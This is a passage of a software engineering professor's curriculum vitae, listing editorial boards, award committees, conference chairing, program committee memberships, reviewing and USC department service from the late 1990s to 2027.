**S16** Member, ACM Publications Board (7/18 - 6/20)

**S17** Guest Editor, IEEE Software, 50th Anniversary of Software Engineering (6/17 - 10/18)

**S18** Associate Editor, ACM Transactions on Software Engineering and Methodology (3/14 - 12/17)

**S19** Associate Editor, Journal of Software Engineering for Robotics (12/08 - 12/17)

**S20** Editorial Board Member, Journal of Software Engineering Research and Development (4/12 - 12/17)

**S21** Editorial Board Member, Springer Computing Journal (2/11 - present)

**S22** Editorial Board Member, Elsevier Journal of Systems and Software (1/11 - 12/17)

**S23** Editorial Board Member, Elsevier Information and Software Technology Journal (1/08 - 12/17)

**S24** Associate Editor, IEEE Transactions on Software Engineering (1/10 - 12/13)

**S25** Guest Editor, Elsevier Journal of Systems and Software, The Future of Software Engineering FOR/IN the Cloud (7/11 - 7/13)

**S26** Guest Editor, The Science of Computer Programming Journal Best Papers of the CompArch 2012 Conference (7/12 - 9/14)

**S27** Member, Steering Committee, Working IEEE/IFIP Conference on Software Architecture (1/05 - 2/08)

## Advisory Boards and Award Committees

**S28** Member, Graduate Program Review Committee, Computer Science, University of California Riverside (2024 - 2025)

**S29** Co-Chair, ICSE 2011 Most Influential Paper Award (3/19 - 5/21)

**S30** Member, ACM Software System Award Committee (9/18 - 7/20)

**S31** Member, Selection Committee, 2016 ACM SIGSOFT Impact Paper Award (12/16 - 5/17)

**S32** Member, Selection Committee, 2015 ACM SIGSOFT Impact Paper Award (12/15 - 5/16)

**S33** Member, Selection Committee, 2014 ACM SIGSOFT Outstanding Research Award (8/13 - 5/14)

**S34** Member, International Selection Committee, Bower Award for Achievement in Science (8/13 - 11/13)

**S35** Member, President's Advisory Board, Carnegie Mellon University - Silicon Valley (1/13 - 4/13)

## Conference/Workshop Chairmanship

**S36** Co-Chair, Computing Research Association (CRA) Affinity Group "AI's Disruption and Opportunity: Affirming the Identity of Computer Science", October-November 2025

**S37** General Co-Chair, 21st IEEE International Conference on Software Architecture (ICSA 2024), Hyderabad, India, 2024

**S38** Chair, Barry Boehm Memorial Symposium, Los Angeles, CA, September 2014

**S39** Co-Chair, ICSE Showcase, 45th International Conference on Software Engineering (ICSE 2023), Melbourne, Australia, May 2023

**S40** Co-Chair, Doctoral Symposium, 44th International Conference on Software Engineering (ICSE 2022), Pittsburgh, PA, May 2022

**S41** Co-Chair, 2nd International Workshop on Establishing the Community-Wide Infrastructure for Architecture-Based Software Engineering (ECASE 2019), Montreal, Canada, May 2019

**S42** Co-Chair, 50 Years of Software Engineering Track, 40th International Conference on Software Engineering (ICSE 2018), Gothenburg, Sweden, May 2018

**S43** Co-Chair, 2nd International Workshop on Infrastructures and Instruments For Software Architecture (REINFORCE), Urbana-Champaign, IL, November 2017

**S44** Co-Chair, 1st International Workshop on Establishing the Community-Wide Infrastructure for Architecture-Based Software Engineering (ECASE 2017), Buenos Aires, Argentina, May 2017

**S45** Program Co-Chair, Innovations in Software Engineering Conference (ISEC 2017), Jaipur, India, February 2017

**S46** Co-Chair, 1st Workshop on Infrastructures and Instruments For Software Architecture (REINFORCE), Los Angeles, CA, January 2017

**S47** Co-Chair, Workshops, 36th International Conference on Software Engineering (ICSE 2014), Hyderabad, India, June 2014

**S48** Chair, International Symposium to Commemorate the 45th Anniversary of the First Software Engineering Conference (SE@45), University of Southern California, Los Angeles, CA, October 2013

**S49** Program Co-Chair, 15th International ACM SIGSOFT Symposium on Component Based Software Engineering (CBSE-2012), Bertinoro, Italy, June 2012

**S50** Program Co-Chair, 33rd International Conference on Software Engineering (ICSE 2011), Honolulu, HI, May 2011

**S51** Program Co-Chair, Workshop on Software Engineering for Cloud Computing (SECLOUD 2011), Honolulu, HI, May 2011

**S52** Program Co-Chair, 3rd IEEE International Conference on Self-Adaptive and Self-Organizing Systems (SASO 2009), San Francisco, CA, September 14-18, 2009

**S53** Workshop Co-Chair, IEEE/CSSE/ISE Workshop on Software Architecture Challenges for the 21st Century, Los Angeles, CA, June 2009

**S54** Program Co-Chair, 2nd International ICSE Warm-up Workshop (WUP 2009), Cape Town, South Africa, April 2009

**S55** Workshop Chair, USC-CSSE Annual Research Review and Executive Workshop, Los Angeles, CA, March 2009

**S56** Program Chair, Doctoral Symposium, 16th ACM SIGSOFT International Symposium on the Foundations of Software Engineering (FSE 16), Atlanta, GA, November 2008

**S57** Program Chair, Special Session on Software Architecture for Pervasive Systems (SAPS), 34th Euromicro Conference in Parma, Italy, September 3-5, 2008

**S58** Program Co-Chair, 2005 Working IEEE/IFIP Conference on Software Architecture (WICSA 2005), Pittsburgh, PA, November 2005

**S59** Chair, Executive Workshop on Model-Driven Architecture, Annual Research Review, Center for Software Engineering, University of Southern California, Los Angeles, CA, March 2005

**S60** Chair, Workshops, 26th International Conference on Software Engineering (ICSE 2004), Edinburgh, UK, May 2004

**S61** Co-Chair, Tutorials, 9th European Software Engineering Conference and 11th ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2003), Helsinki, Finland, September 2003

**S62** Chair, State-of-the-Art Track, 24th International Conference on Software Engineering (ICSE 2002), Orlando, FL, May 2002

**S63** Co-Chair, First International Workshop on Evaluating Software Architecture Solutions (WESAS), Irvine, CA, May 2000

## Conference/Workshop Organization

**S64** Panelist, New Software Engineering Faculty Symposium, 48th International Conference on Software Engineering (ICSE 2026), Rio de Janeiro, Brazil, April 2026

**S65** Session Co-Chair, Computing Research Association (CRA) Summit, Affinity Group Meeting, R1 Private Universities, San Francisco, CA, July 2025

**S66** Organizing Committee Member, First International Workshop on Bringing Architecture Design Thinking into Developers' Daily Activities (Bridge 2016), Austin, TX, May 2016

**S67** Organizing Committee Member, 39th International Conference on Software Engineering (ICSE 2017) Warm-up Workshop, Maceio, Brazil, October 2014

**S68** Technical Paper Session Chair, 22nd ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE 2014), Hong Kong, November 2014

**S69** Workshops Selection Committee Member, 8th Joint meeting of the European Software Engineering Conference and the ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2011), Szeged, Hungary, September 2011

**S70** Technical Paper Session Chair, 12th European Software Engineering Conference and 17th ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2009), Amsterdam, the Netherlands, August 2009

**S71** Student Volunteer Coordinator, 30th International Conference on Software Engineering (ICSE 2008), Leipzig, Germany, May 2008

**S72** Technical Paper Session Chair, Working IEEE/IFIP Conference on Software Architecture (WICSA 2008), Vancouver, Canada, February 2008

**S73** E-Publicity Chair, 29th International Conference on Software Engineering (ICSE 2007), Minneapolis, MN, May 2007

**S74** Session Chair, USC Center for Systems and Software Engineering Convocation, Los Angeles, CA, October 2006

**S75** Panelist, New Software Engineering Faculty Symposium (NSEFS 05), 27th International Conference on Software Engineering (ICSE 2005), St. Louis, MO, May 2005

**S76** Technical Paper Session Chair, 19th IEEE International Conference on Automated Software Engineering (ASE 2004), Linz, Austria, September 2004

**S77** Session Organizer and Chair, Annual Research Review, Center for Software Engineering, University of Southern California, Los Angeles, CA, March 2004

**S78** Session Organizer and Chair, Annual Research Review, Center for Software Engineering, University of Southern California, Los Angeles, CA, March 2003

**S79** Session Chair, Dagstuhl Workshop on Software Architecture Recovery and Modeling (SWARM), Dagstuhl, Germany, February 2003

**S80** Chair, Tutorials, The Third Working IEEE/IFIP Conference on Software Architecture (WICSA-3), Montreal, Canada, August 2002

**S81** Technical Paper Session Chair, The Working IEEE/IFIP Conference on Software Architecture (WICSA-3), Montreal, Canada, August 2002

**S82** Technical Paper Session Chair, 24th International Conference on Software Engineering (ICSE 2002), Orlando, FL, May 2002

**S83** Session Organizer and Chair, Annual Research Review, Center for Software Engineering, University of Southern California, Los Angeles, CA, March 2002

**S84** Technical Paper Session Chair, Eighth European Software Engineering Conference and Ninth ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2001), Vienna, Austria, September 2001

**S85** Technical Paper Session Chair, 23rd International Conference on Software Engineering (ICSE 2001), Toronto, Canada, May 2001

**S86** Session Organizer and Chair, Annual Research Review, Center for Software Engineering, University of Southern California, Los Angeles, CA, March 2001

**S87** Technical Paper Session Chair, Eighth ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE8), San Diego, CA, November 2000

**S88** Session Organizer and Chair, Annual Research Review, Center for Software Engineering, University of Southern California, Los Angeles, CA, March 2000

**S89** Organizing Committee Member, NSF Workshop on Software Engineering Research Strategies, Los Angeles, CA, August 1999

**S90** Student Volunteer Coordinator, 21st International Conference on Software Engineering (ICSE'99), Los Angeles, CA, May 1999

**S91** Co-Chair, DARPA/ITO EDCS Workshop on Architecture Description Language Toolkits, San Diego, CA, October 1998

**S92** Chair, DARPA/ITO EDCS Workshop on the UML, Austin, TX, November 1997

**S93** Webmaster, 1997 International Conference on Software Engineering (ICSE'97), Boston, MA, May 1997

## Program Committee Membership

**S94** Committee Member, ICSE 2017 Most Influential Paper Award, 49th International Conference on Software Engineering (ICSE 2027), Dublin, Ireland, April-May 2027

**S95** Program Committee Member, 45th International Conference on Software Engineering (ICSE 2023), Melbourne, Australia, May 2023

**S96** Program Committee Member, 44th International Conference on Software Engineering (ICSE 2022), Pittsburgh, PA, May 2022

**S97** Program Committee Member, 5th IEEE International Conference on Software Architecture (ICSA 2021), Stuttgart, Germany, March 2021

**S98** Program Committee Member, Journal-First Track, International Conference on Software Engineering (ICSE 2020), Seoul, South Korea, May 2020

**S99** Program Committee Member, 4th IEEE International Conference on Software Architecture (ICSA 2020), Salvador, Brazil, March 2020

**S100** Program Committee Member, ACM SIGSOFT Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2019), Tallinn, Estonia, August 2019

**S101** Program Committee Member, Journal-First Track, International Conference on Software Engineering (ICSE 2019), Montreal, Canada, May 2019

**S102** Program Committee Member, ACM SIGSOFT Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2018), Lake Buena Vista, FL, November 2018

**S103** Program Committee Member, 40th International Conference on Software Engineering (ICSE 2018), Gothenburg, Sweden, May 2018

**S104** Program Committee Member, International Workshop on Software Fairness (FairWare 2018), Gothenburg, Sweden, May 2018

**S105** Program Committee Member, 2nd IEEE International Conference on Software Architecture (ICSA 2018), Seattle, WA, April 2018

**S106** Program Committee Member, Innovations in Software Engineering Conference (ISEC 2018), Hyderabad, India, February 2018

**S107** Symposium Committee Member, Doctoral Symposium, 11th joint meeting of the European Software Engineering Conference and the ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2017), Paderborn, Germany, September 2017

**S108** Symposium Committee Member, Doctoral Symposium, 39th International Conference on Software Engineering (ICSE 2017), Buenos Aires, Argentina, May 2017

**S109** Program Board Member, 39th International Conference on Software Engineering (ICSE 2017), Buenos Aires, Argentina, May 2017

**S110** Symposium Committee Member, Doctoral Symposium, 39th International Conference on Software Engineering (ICSE 2017), Buenos Aires, Argentina, May 2017

**S111** Program Committee Member, 1st IEEE International Conference on Software Architecture (ICSA 2017), Gothenburg, Sweden, April 2017

**S112** Mentoring Committee Member, 24th ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE 2016), Seattle, WA, November 2016

**S113** Program Committee Member, 11th International Symposium on Software Engineering for Adaptive and Self-Managing Systems (SEAMS 2016), Austin, TX, May 2016

**S114** Program Committee Member, Joint 13th Working IEEE/IFIP Conference on Software Architecture (WICSA), 19th International ACM SIGSOFT Symposium on Component-Based Software Engineering (CBSE), and 12th International ACM SIGSOFT Conference on the Quality of Software Architectures (QoSA), Venice, Italy, April 2016

**S115** Program Committee Member, 9th Annual India Software Engineering Conference (ISEC 2016), Goa, India, February 2016

**S116** Program Board Member, 38th International Conference on Software Engineering (ICSE 2016), Austin, TX, May 2016

**S117** Program Committee Member, 5th International Workshop on the Twin Peaks of Requirements and Architecture, Florence, Italy, May 2015

**S118** Symposium Committee Member, Doctoral Symposium, 37th International Conference on Software Engineering (ICSE 2015), Florence, Italy, May 2015

**S119** Program Committee Member, Technical Briefings, 37th International Conference on Software Engineering (ICSE 2015), Florence, Italy, May 2015

**S120** Program Committee Member, 22nd ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE 2014), Hong Kong, November 2014

**S121** Program Committee Member, 8th European Conference on Software Architecture (ECSA 2014), Vienna, Austria, August 2014

**S122** Expert Reviewer Panel Member, 28th IEEE/ACM International Conference on Automated Software Engineering (ASE 2013), Palo Alto, CA, November 2013

**S123** Program Committee Member, 9th joint meeting of the European Software Engineering Conference and the ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2013), Saint Petersburg, Russia, August 2013

**S124** Symposium Committee Member, Doctoral Symposium, 9th joint meeting of the European Software Engineering Conference and the ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2013), St. Petersburg, Russia, August 2013

**S125** Program Committee Member, 7th European Conference on Software Architecture (ECSA 2013), Montpelier, France, July 2013

**S126** Program Committee Member, 7th ACM International Conference on Distributed Event-Based Systems (DEBS 2013), Arlington, TX, June-July 2013

**S127** Program Committee Member, 16th International ACM SIGSOFT Symposium on Component-Based Software Engineering, Vancouver, Canada, June 2013

**S128** Program Committee Member, 4th International ACM SIGSOFT Symposium on Architecting Critical Systems (ISARCS), Vancouver, Canada, June 2013

**S129** Program Committee Member, 33rd International Conference on Software Engineering - New Ideas and Emerging Results Track, San Francisco, CA, May 2013

**S130** Program Committee Member, 2nd International Workshop on the Twin Peaks of Requirements and Architecture, San Francisco, CA, May 2013

**S131** Program Committee Member, 1st International Workshop on the Twin Peaks of Requirements and Architecture, Chicago, IL, September 2012

**S132** Program Committee Member, 6th ACM International Conference on Distributed Event-Based Systems, Berlin, Germany, July 2012

**S133** Program Committee Member, 7th International Symposium on Software Engineering for Adaptive and Self-Managing Systems (SEAMS 2012), Zurich, Switzerland, June 2012

**S134** Program Committee Member, 3rd International Workshop on Software Engineering for Sensor Network Applications, Zurich, Switzerland, June 2012

**S135** Mentoring Committee Member, 34th International Conference on Software Engineering (ICSE 2012), Zurich, Switzerland, June 2012

**S136** Program Committee Member, 22nd IEEE International Symposium on Software Reliability Engineering, Hiroshima, Japan, November-December 2011

**S137** Program Committee Member, 9th IEEE International Conference on Software Engineering and Formal Methods, Montevideo, Uruguay, November 2011

**S138** Expert Reviewer Panel Member, 26th IEEE/ACM International Conference on Automated Software Engineering (ASE 2011), Lawrence, KS, November 2011

**S139** Workshops Committee Member, The joint meeting of the European Software Engineering Conference and the ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2011), Szeged, Hungary, September 2011

**S140** Program Committee Member, 5th Brazilian Symposium on Software Components, Architectures, and Reuse (SBCARS), Sao Paulo, Brazil, September 2011

**S141** Program Committee Member, 9th IEEE/IFIP Working Conference on Software Architecture (WICSA), Boulder, CO, June 2011

**S142** Program Committee Member, 6th International Symposium on Software Engineering for Adaptive and Self-Managing Systems (SEAMS), Honolulu, HI, May 2011

**S143** Program Committee Member, IEEE Globecom 2010 Workshop on Pervasive Group Communications (PerGroup), Miami, FL, December 2010

**S144** Program Committee Member, 18th ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE 2010), Santa Fe, NM, November 2010

**S145** Program Committee Member, International Symposium on Architecting Critical Systems (ISARCS 2010), Prague, Czech Republic, June 2010

**S146** Program Committee Member, 32nd International Conference on Software Engineering, Cape Town, South Africa, May 2010

**S147** Program Committee Member, 5th International Workshop on Software Engineering for Adaptive and Self-Managing Systems (SEAMS), Cape Town, South Africa, May 2010

**S148** Program Committee Member, Workshop on Flexible Modeling Tools (FlexiTools), Cape Town, South Africa, May 2010

**S149** Program Committee Member, Workshop on Quantitative Stochastic Models in the Verification and Design of Software Systems (QUOVADIS), Cape Town, South Africa, May 2010

**S150** Expert Panel Member, 24th IEEE/ACM International Conference on Automated Software Engineering (ASE 2008), Auckland, New Zealand, November 2009

**S151** Program Committee Member, 8th Working IEEE/IFIP Conference on Software Architecture (WICSA) and 3rd European Conference on Software Architecture (ECSA), Cambridge, UK, September 2009

**S152** Program Committee Member, 12th European Software Engineering Conference and 17th ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2009), Amsterdam, the Netherlands, August 2009

**S153** Program Committee Member, 8th International Workshop on the Foundations of Coordination Languages and Software Architectures (FOCLASA'09), Rhodes, Grece, July 2009

**S154** Program Committee Member, DSN 2009 Workshop on Architecting Dependable Systems (WADS 2007), Lisbon, Portugal, June 2009

**S155** Program Committee Member, 5th International Conference on the Quality of Software Architecture (QoSA 2009), East Stroudsburg, PA, June 2009

**S156** Program Committee Member, 6th International Conference on Autonomic Computing (ICAC), Barcelona, Spain, June 2009

**S157** Program Committee Member, 4th International Workshop on UML and AADL, Potsdam, Germany, June 2009

**S158** Program Committee Member, 31st International Conference on Software Engineering, Vancouver, Canada, May 2009

**S159** Program Committee Member, 4th International Conference on the Quality of Software Architectures (QoSA 2008), Karlsruhe, Germany, October 2008

**S160** Program Committee Member, 11th International Symposium on Component-Based Software Engineering (CBSE 2008), Karlsruhe, Germany, October 2008

**S161** Program Committee Member, 23rd IEEE/ACM International Conference on Automated Software Engineering (ASE 2008), L'Aquila, Italy, September 2008

**S162** Program Committee Member, 2nd Brazilian Symposium on Software Components, Architectures, and Reuse (SBCARS 2008), Porto Alegre, Brazil, August 2008

**S163** Program Committee Member, 7th International Workshop on the Foundations of Coordination Languages and Software Architectures (FOCLASA'08), Reykjavik, Iceland, July 2008

**S164** Program Committee Member, DSN 2008 Workshop on Architecting Dependable Systems (WADS 2007), Anchorage, AK, June 2008

**S165** Program Committee Member, 30th International Conference on Software Engineering, Leipzig, Germany, May 2008

**S166** Symposium Committee Member, Doctoral Symposium, 30th International Conference on Software Engineering, Leipzig, Germany, May 2008

**S167** Program Committee Member, 3rd International Workshop on Software Engineering for Adaptive and Self-Managing Systems (SEAMS 2008), Leipzig, Germany, May 2008

**S168** Program Committee Member, International Workshop on Software Architectures and Mobility (SAM 2008), Leipzig, Germany, May 2008

**S169** Program Committee Member, 22nd IEEE/ACM International Conference on Automated Software Engineering, Atlanta, GA, November 2007

**S170** Program Committee Member, International Workshop on the Engineering of Software Services for Pervasive Environments (ESSPE), Dubrovnik, Croatia, September 2007

**S171** Program Committee Member, 10th International Symposium on Component-Based Software Engineering (CBSE 2007), Boston, MA, July 2007

**S172** Program Committee Member, 3rd International Conference on the Quality of Software Architectures (QoSA 2007), Boston, MA, July 2007

**S173** Program Committee Member, First IEEE International Conference on Self-Adaptive and Self-Organizing Systems (SASO 2007), Boston, MA, July 2007

**S174** Program Committee Member, DSN 2007 Workshop on Architecting Dependable Systems (WADS 2007), Edinburgh, UK, June 2007

**S175** Program Committee Member, 2nd International Workshop on Software Engineering for Adaptive and Self-Managing Systems (SEAMS 2007), Minneapolis, MN, May 2007

**S176** Program Committee Member, 2nd Workshop on Sharing and Reusing Architectural Knowledge - Architecture Rationale and Design Intent (SHARK/ADI), Minneapolis, MN, May 2007

**S177** Tutorials Committee Member, 29th International Conference on Software Engineering (ICSE 2007), Minneapolis, MN, May 2007

**S178** Program Committee Member, Workshop on Tools, Operating Systems and Programming Models for Developing Reliable Systems (TOPMoDelS), Long Beach, CA, March 2007

**S179** Program Committee Member, 6th International Workshop on Software and Performance (WOSP 2007), Buenos Aires, Argentina, February 2007

**S180** Program Committee Member, 6th Working IEEE/IFIP Conference on Software Architecture, Mumbai, India, January 2007

**S181** Program Committee Member, 14th ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE 14), Portland, OR, November 2006

**S182** Symposium Committee Member, Doctoral Symposium, 14th ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE 14), Portland, OR, November 2006

**S183** Expert Reviewer Panel Member, 21st IEEE/ACM International Conference on Automated Software Engineering (ASE 2006), Tokyo, Japan, September 2006

**S184** Doctoral Symposium Committee Member, 21st IEEE/ACM International Conference on Automated Software Engineering (ASE 2006), Tokyo, Japan, September 2006

**S185** Program Committee Member, 9th International Symposium on Component-Based Software Engineering (CBSE 2006), Västerås, Sweden, June/July 2006

**S186** Program Committee Member, ICSE 2006 Workshop on Software Engineering for Adaptive and Self-Managing Systems (SEAMS), Shanghai, China, May 2006

**S187** Tutorials Committee Member, 28th International Conference on Software Engineering (ICSE 2006), Shanghai, China, May 2006

**S188** Program Committee Member, 20th IEEE International Conference on Automated Software Engineering (ASE 2005), Long Beach, CA, November 2005

**S189** Program Committee Member, 10th European Software Engineering Conference and 13th ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2005), Lisbon, Portugal, September 2005

**S190** Program Committee Member, 9th International Software Product Line Conference (SPLC- EUROPE 2005), Rennes, France, September 2005

**S191** Program Committee Member, 5th International Workshop on Software Engineering and Middleware (SEM 2005), Lisbon, Portugal, 5-6 September 2005

**S192** Program Committee Member, Workshop on Architecture-Centric Evolution (ACE 2005), Glasgow, UK, July 2005

**S193** Program Committee Member, 4th International Workshop on Architecting Dependable Systems (WADS 2004), St. Louis, MO, May 2005

**S194** Program Committee Member, 8th International Symposium on Component-Based Software Engineering (CBSE8), St. Louis, MO, May 2005

**S195** Program Committee Member, Workshop on Software Composition (SC 2005), Edinburgh, UK, April 2005

**S196** Program Committee Member, Hawaii International Conference on System Sciences, Mini- Track on Strategic Software Engineering, Hawaii, January 2005

**S197** Program Committee Member, 2004 Workshop on Self-Managed Systems, Newport Beach, CA, November 2004

**S198** Program Co-Chair, Workshop on Software Architecture Description & UML, Lisbon, Portugal, October 2004

**S199** Program Committee Member, 19th IEEE International Conference on Automated Software Engineering (ASE 2004), Linz, Austria, September 2004

**S200** Program Committee Member, 4th IEEE/IFIP Working Conference on Software Architecture (WICSA-4), Oslo, Norway, June 2004

**S201** Program Committee Member, Workshop on Capturing Experience in Software Architecture Best Practices, Oslo, Norway, June 2004

**S202** Program Committee Member, Twin Workshops on Architecting Dependable Systems (WADS 2004), Edinburgh, UK, May 2004 and Florence, Italy, June 2004

**S203** Program Committee Member, 2nd International Working Conference on Component Deployment (CD 2004), Edinburgh, UK, May 2004

**S204** Program Committee Member, 7th International Symposium on Component-Based Software Engineering (CBSE7), Edinburgh, UK, May 2004

**S205** Program Committee Member, International Workshop on Incorporating COTS into Software Systems: Tools and Techniques (IWICSS), Redondo Beach, CA, February 2004

**S206** Program Committee Member, 10th Working Conference on Reverse Engineering (WCRE 2003), Victoria, BC, Canada, November 2003

**S207** Program Committee Member, 5th International Workshop on Product Family Engineering (PFE-5), Siena, Italy, November 2003

**S208** Program Committee Member, 2nd International Workshop on Architecting Dependable Systems (WADS 2003), Portland, OR, May 2003

**S209** Program Committee Member, Conference on Generative and Component-Based Software Engineering (GCSE), Pittsburgh, PA, October 2002

**S210** Program Committee Member, The Working IEEE/IFIP Conference on Software Architecture (WICSA-3), Montreal, Canada, August 2002

**S211** Program Committee Member, 2nd Software Product Line Conference (SPLC-2), San Diego, CA, August 2002

**S212** Program Committee Member, International Workshop on Mobile Teamwork, Vienna, Austria, July 2002

**S213** Program Committee Member, ECOOP 2002 Workshop on Concrete Communication Abstractions Of The Next 701 Distributed Object Systems, Malaga, Spain, June 2002

**S214** Program Committee Member, 24th International Conference on Software Engineering (ICSE 2002), Orlando, FL, May 2002

**S215** Symposium Committee Member, Doctoral Symposium, 24th International Conference on Software Engineering (ICSE 2002), Orlando, FL, May 2002

**S216** Program Committee Member, 1st International Workshop on Architecting Dependable Systems (WADS 2002), Orlando, FL, May 2002

**S217** Program Committee Member, 4th International Workshop on Product Family Engineering (PFE-4), Bilbao, Spain, October 2001

**S218** Program Committee Member, 8th European Software Engineering Conference and 9th ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2001), Vienna, Austria, September 2001

**S219** Program Committee Member, The Second Working IEEE/IFIP Conference on Software Architecture (WICSA-2), Amsterdam, The Netherlands, August 2001

**S220** Program Committee Member, 23rd International Conference on Software Engineering (ICSE 2001), Toronto, Canada, May 2001

**S221** Program Committee Member, Second International Workshop on Engineering Distributed Objects (EDO 2000), Davis, CA, November 2000

**S222** Program Committee Member, Eighth ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE8), San Diego, CA, November 2000

**S223** Program Committee Member, Fourth International Software Architecture Workshop (ISAW-4), Limerick, Ireland, June 2000

**S224** Program Committee Member, Third International Workshop on Software Architectures for Product Families (IW-SAPF-3), Las Palmas de Gran Canaria, Spain, March 2000

## Referee and Reviewer Service

**S214** Journal of Empirical Software Engineering 2017

**S225** National Science Foundation, Review Panel 1/2000, 10/2003, 11/2013, 1/2016, 3/2018, 10/2021, 10/2024

**S226** ACM Transactions on Autonomous and Adaptive Systems 2015

**S227** ACM Transactions on Software Engineering and Methodology 1998, 1999, 2001-2013

**S228** IEEE Transactions on Software Engineering 1997- 2001, 2003-2009, 2025

**S229** Elsevier Information and Software Technology Journal 2007, 2008, 2011, 2014-2016

**S230** Journal of Software Engineering for Robotics 2009

**S231** Architecting Dependable Systems VI, LNCS, Springer Verlag 2009

**S232** IEEE Software 2008

**S233** IEEE Transactions on Industrial Informatics 2008

**S234** Journal of Systems and Software 2005, 2006, 2007, 2008, 2011, 2015

**S235** University of Wisconsin-Milwaukee, Research Growth Initiative 2006

**S236** Journal of Automated Software Engineering 1999, 2000, 2005

**S237** 28th International Conference on Software Engineering, Outside Reviewer 2005

**S238** Architecting Dependable Systems III, LNCS, Springer Verlag 2005

**S239** Architecting Dependable Systems II, LNCS, Springer Verlag 2004

**S240** IEEE Transactions on Parallel and Distributed Systems 2003, 2004

**S241** National Science Foundation, Proposal Reviewer (PASI) 2/2011

**S242** IEEE Computer, Special Issue on Handheld Computing 2003

**S243** Architecting Dependable Systems, LNCS, Springer Verlag 2003

**S244** International Journal on Software Maintenance and Evolution 2002

**S245** Science Foundation Ireland 2002

**S246** IEE Proceedings - Software Engineering 1998

**S247** Conference on User Interface Software and Technology, Outside Reviewer 1996

**S248** 19th International Conference on Software Engineering, Outside Reviewer 1997

### Other

**S249** Member, IFIP Working Group 2.4 – Software Implementation Technologies (2020 - present)

**S250** Participant, IFIP Working Group 2.10 - Software Architecture (2002 - 2007)

## 13 University Service

**S251** Chair, Thomas Lord Department of Computer Science, USC (7/22 – present)

**S252** Vice-Chair for Tenure Affairs, Department of Computer Science, USC (7/21 – 6/22)

**S253** Chair, DEI Committee, Computer Science Department, USC (2/21 – 6/22)

**S254** Chair, Hiring Committee, Computer Science Department, USC (10/21 – 5/22)

**S255** Chair, Hiring Committee, Computer Science Department, USC (10/20 - 5/21)

**S256** Member, Ad-Hoc Promotion and Tenure Committee, Computer Science Department, USC (1/20 - 3/21)

**S257** Appointments, Promotions, and Tenure (APT) Committee, Viterbi School of Engineering, USC (8/20 - 7/21)

**S258** APT Executive Committee, Viterbi School of Engineering, USC (8/20 - 7/21)

**S259** Area Lead, Computer Systems Area, Computer Science Department, USC (8/19 - 8/20)

**S260** Member, Faculty Hiring Committee - Software Engineering, Computer Science Department, USC (12/19 - 5/20)

**S261** Member, Faculty Hiring Committee - Programming Languages, Computer Science Department, USC (12/19 - 5/20)

**S262** Chair, Ad-Hoc Promotion and Tenure Committee, Computer Science Department, USC (12/19 - 3/20)

**S263** Member, Research Ethics Committee, University of Southern California (2/19 - 5/20)

**S264** Committee on Academic Policies and Procedures, University of Southern California (8/17 - 8/21)

**S265** Chair, Ad-Hoc Promotion and Tenure Committee, Computer Science Department, USC (8/19 - 1/20)

**S266** Member, Hiring Committee, Computer Science Department, USC (10/18 - 5/19)

**S267** Member, Ad-Hoc Promotion and Tenure Committee, Computer Science Department, USC (12/18 - 5/19)

**S268** Chair, Teaching Faculty Merit Review Committee, Computer Science Department, USC (1/18 - 5/18)

**S269** Chair, Ad-Hoc Promotion and Tenure Committee, Computer Science Department, USC (8/17 - 12/17)

**S270** Member, Joint-Appointment Review Committee, Computer Science Department, USC (9/17 - 11/17)

**S271** Member, Ad-Hoc Promotion and Tenure Committee, Computer Science Department, USC (3/17 - 5/17)

**S272** Chair, Faculty Hiring Committee - Programming Languages, Computer Science Department, USC (12/16 - 5/17)

**S273** Member, Merit Review Committee, Computer Science Department, USC (2/17 - 3/17)

**S274** Chair, Merit Review Process Committee, Computer Science Department, USC (8/16 - 2/17)

**S275** Chair, Merit Review Committee, Computer Science Department, USC (2/16 - 3/16)

**S276** Chair, Research Faculty Promotion Committee Computer Science Department, USC (1/16 – present)

**S277** Chair, Research Faculty Promotion Committee, Computer Science Department, USC (11/15 - 11/16)

**S278** Chair, Faculty Hiring Committee - Software Engineering, Computer Science Department, USC (12/15 - 5/16)

**S279** Chair, Faculty Hiring Committee - Programming Languages, Computer Science Department, USC (12/15 - 5/16)

**S280** Chair, Ad-Hoc Promotion and Tenure Committee, Computer Science Department USC (3/15 - 5/16)

**S281** Ad-Hoc Promotion Committee, Computer Science Department, USC (5/15 - 5/16)

**S282** Associate Chair for Ph.D. Affairs, Computer Science Department, USC (7/11 - 6/15)

**S283** Chair, PhD Program Reboot Committee, Computer Science Department, USC (8/13 - 6/15)

**S284** Chair, Ph.D. Admissions Committee, Computer Science Department, USC (7/11 - 6/15)

**S285** Ph.D. Council, Viterbi School of Engineering, USC (1/12 - 6/15)

**S286** Research Committee, Viterbi School of Engineering, USC (7/12 - 8/13)

**S287** Transformative Faculty Hiring Committee, Computer Science Department, USC (6/12 - 5/13)

**S288** Director, Center for Systems & Software Engineering, Viterbi School of Engineering USC (1/09 - 2/13)

**S289** Joint Faculty Appointment Committee, Computer Science Department, USC (11/12 - 12/12)

**S290** Department Chair Search Committee, Computer Science Department, USC (9/11 - 5/12)

**S291** Chair Performance Evaluation Committee, Computer Science Department, USC (3/12 - 5/12)

**S292** Department Ranking Committee, Computer Science Department (2/12 - 5/12)

